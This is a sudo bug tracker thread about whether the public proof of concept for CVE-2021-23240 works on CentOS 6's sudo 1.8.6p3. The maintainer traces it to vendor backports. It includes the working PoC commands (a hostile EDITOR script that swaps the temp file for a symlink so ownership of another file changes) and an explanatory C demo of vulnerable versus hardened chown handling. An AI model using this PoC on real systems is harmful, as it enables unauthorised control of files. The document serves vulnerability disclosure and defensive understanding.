Bug 979 - PoC for CVE-2021-23240 also work on sudo-1.8.6
Status: RESOLVED INVALID
Product: Sudo
Classification: Unclassified
Component: Documentation
Version: 1.8.6
Hardware: PC Other
Importance: low normal
Assigned To: Todd C. Miller
Depends on:
Blocks:
Reported: 2021-06-17 02:55 MDT by Aleksey Deyneko
Modified: 2021-06-17 09:38 MDT (History)

See Also:


Attachments
strace.out (62.99 KB, text/plain)
2021-06-17 06:49 MDT, Aleksey Deyneko

Description Aleksey Deyneko 2021-06-17 02:55:32 MDT
First of all, in the CVE DB (https://cve.circl.lu/cve/CVE-2021-23240) the affected sudo versions start from 1.3.0. But on the sudo site the affected versions start from 1.8.11.

So I tried to check whether sudo-1.8.6 (OS CentOS 6) is affected by the PoC. And it is affected, or at least the PoC works.

From the PoC description:

# echo 0 > /proc/sys/fs/protected_symlinks
-bash: /proc/sys/fs/protected_symlinks: No such file or directory

# cat /etc/sudoers
testuser ALL=(root) sudoedit /etc/somefile
...

$ cat > myeditor <<'EOF'
> #!/bin/sh
> echo replacing $1
> rm $1
> ln -s /home/testuser/targetfile $1
> exit 0
> EOF

$ chmod 755 myeditor
$ touch /home/testuser/targetfile
$ ls -l /home/testuser/targetfile
-rw-rw-r--. 1 testuser testuser 0 Jun 17 07:38 /home/testuser/targetfile

$ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile
[sudo] password for testuser:
replacing /var/tmp/sudo.Uxthl3

$ ll /home/testuser/targetfile
-rw-rw-r--. 1 root root 0 Jun 17 07:38 /home/testuser/targetfile

$ cat /etc/*release
CentOS release 6.10 (Final, ELS by Cloudlinux)

$ rpm -qa | grep sudo
sudo-1.8.6p3-29.el6_10.3.x86_64

So I think this means that the affected versions start earlier than 1.8.11, or the PoC is not correct.
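The PoC above turns on one detail of how a sudoedit temporary file is handed back: after the editor exits, sudoedit restores the file's ownership, and if it does that with a path-based chown() the call follows whatever the editor left at that path. The hostile myeditor replaces the temp file with a symlink, so the chown lands on /home/testuser/targetfile instead. The following is an added illustration of that vulnerable pattern beside a hardened one; it is not sudo's code, the function names are invented, and the SELinux role/type handling that makes the real code path reachable is left out. The hardened variant opens with O_NOFOLLOW, confirms via fstat() that it holds a regular file with a single link, and changes ownership through the descriptor, so the editor's symlink swap is refused with ELOOP. The demo runs unprivileged: it chowns to the caller's own uid/gid, which any user may do, so the behaviour is observable without root.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern (illustrative, not sudo's code): restore ownership by
 * path after the editor has returned.  chown() follows symlinks, so if the
 * editor replaced the temp file with a link, the target of the link gets
 * the new owner. */
int restore_owner_by_path(const char *path, uid_t uid, gid_t gid)
{
    return chown(path, uid, gid);
}

/* Hardened pattern: never follow a link, verify the object is a plain
 * regular file with exactly one name (no hard-link games), then operate on
 * the descriptor rather than the path. */
int restore_owner_by_fd(const char *path, uid_t uid, gid_t gid)
{
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd == -1)
        return -1;              /* errno == ELOOP when path is a symlink */

    struct stat sb;
    if (fstat(fd, &sb) == -1 || !S_ISREG(sb.st_mode) || sb.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    int rc = fchown(fd, uid, gid);
    close(fd);
    return rc;
}

/* Re-creates the PoC's setup in a private temp directory (constructed data,
 * not the reporter's files): a victim "targetfile" and a "temp file" that
 * the hostile editor has already turned into a symlink to the victim.
 * Fills in the return codes of each variant and returns 0 on setup success. */
int run_demo(int *by_path, int *by_fd, int *regular_ok)
{
    char dir[] = "/tmp/sudoedit-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;

    char target[PATH_MAX], tmpfile[PATH_MAX];
    snprintf(target, sizeof target, "%s/targetfile", dir);
    snprintf(tmpfile, sizeof target, "%s/sudo.tmp", dir);

    int fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd == -1)
        return -1;
    close(fd);

    uid_t uid = getuid();
    gid_t gid = getgid();

    /* Sanity check: the hardened variant accepts a genuine regular file. */
    *regular_ok = restore_owner_by_fd(target, uid, gid);

    /* What myeditor did: rm $1; ln -s targetfile $1 */
    if (symlink(target, tmpfile) == -1)
        return -1;

    *by_path = restore_owner_by_path(tmpfile, uid, gid);   /* 0: link followed */
    *by_fd   = restore_owner_by_fd(tmpfile, uid, gid);     /* -1: refused */

    unlink(tmpfile);
    unlink(target);
    rmdir(dir);
    return 0;
}

int main(void)
{
    int bp, bf, reg;
    if (run_demo(&bp, &bf, &reg) != 0) {
        perror("setup");
        return 1;
    }
    printf("regular file via fd: %d\n", reg);
    printf("symlink via chown(path): %d (followed the link)\n", bp);
    printf("symlink via fd: %d (%s)\n", bf, bf == -1 ? strerror(ELOOP) : "accepted");
    return 0;
}
```

The same reasoning explains why a vendor backport can reintroduce the bug on an older base version: what matters is whether the shipped binary restores ownership by path or by descriptor on that code path, not the version string printed by sudo -V.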
Comment 1 Aleksey Deyneko 2021-06-17 06:48:32 MDT
I tried to search for chown() in the strace output and found it:

# strace -o strace.out -E EDITOR=/home/testuser/myeditor sudoedit -u testuser -p 12345678 -r unconfined_r -t unconfined_t /etc/somefile
replacing /var/tmp/sudo.jSDgvV

(I don't know how to run strace and sudoedit from a user session; I got the message 'sudoedit: effective uid is not 0, is sudo installed setuid root?')

strace.out added to attachments
Comment 2 Aleksey Deyneko 2021-06-17 06:49:08 MDT
Created attachment 557 [details]
strace.out
Comment 3 Todd C. Miller 2021-06-17 07:01:28 MDT
I'm sorry but that is not a valid test.  The sudo package shipped by RedHat (and CentOS) has thousands of lines of changes backported from newer versions of sudo.  The stock version of sudo 1.8.6p3 does not have the bug because the code in question simply does not exist there.

I just verified this on CentOS 6 by compiling my own sudo 1.8.6p3 package from stock sources:

[testuser@rh6 ~]$ id
uid=501(testuser) gid=501(testuser) groups=501(testuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[testuser@rh6 ~]$ cat myeditor
#!/bin/sh
echo replacing $1
rm $1
ln -s /home/testuser/targetfile $1
exit 0

[testuser@rh6 ~]$ ls -l /home/testuser/targetfile
-rw-r--r--. 1 testuser testuser 0 Jun 17 08:57 /home/testuser/targetfile

[testuser@rh6 ~]$ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile
sudoedit: unable to execute sudoedit: Permission denied
sudoedit: /etc/somefile unchanged
Comment 4 Todd C. Miller 2021-06-17 07:28:12 MDT
I just confirmed that CVE-2021-23240 is present in the RedHat sudo 1.8.6p3 package.  Unfortunately, I can't support old versions of sudo that have large patch sets (which may introduce bugs not present in mainline sudo).

I'll add a note to https://www.sudo.ws/alerts/sudoedit_selinux.html that vendor packages may include patches that cause older sudo packages to be vulnerable.
Comment 5 Todd C. Miller 2021-06-17 09:38:30 MDT
It appears that RedHat only fixed the bug in RHEL 8.  https://access.redhat.com/security/cve/cve-2021-23240

I'm closing this bug as it is specific to the RedHat frankenbuild of sudo and they do not seem to be interested in fixing it for older versions of RHEL.  You can always find builds of the latest version of sudo at https://www.sudo.ws/download.html#binary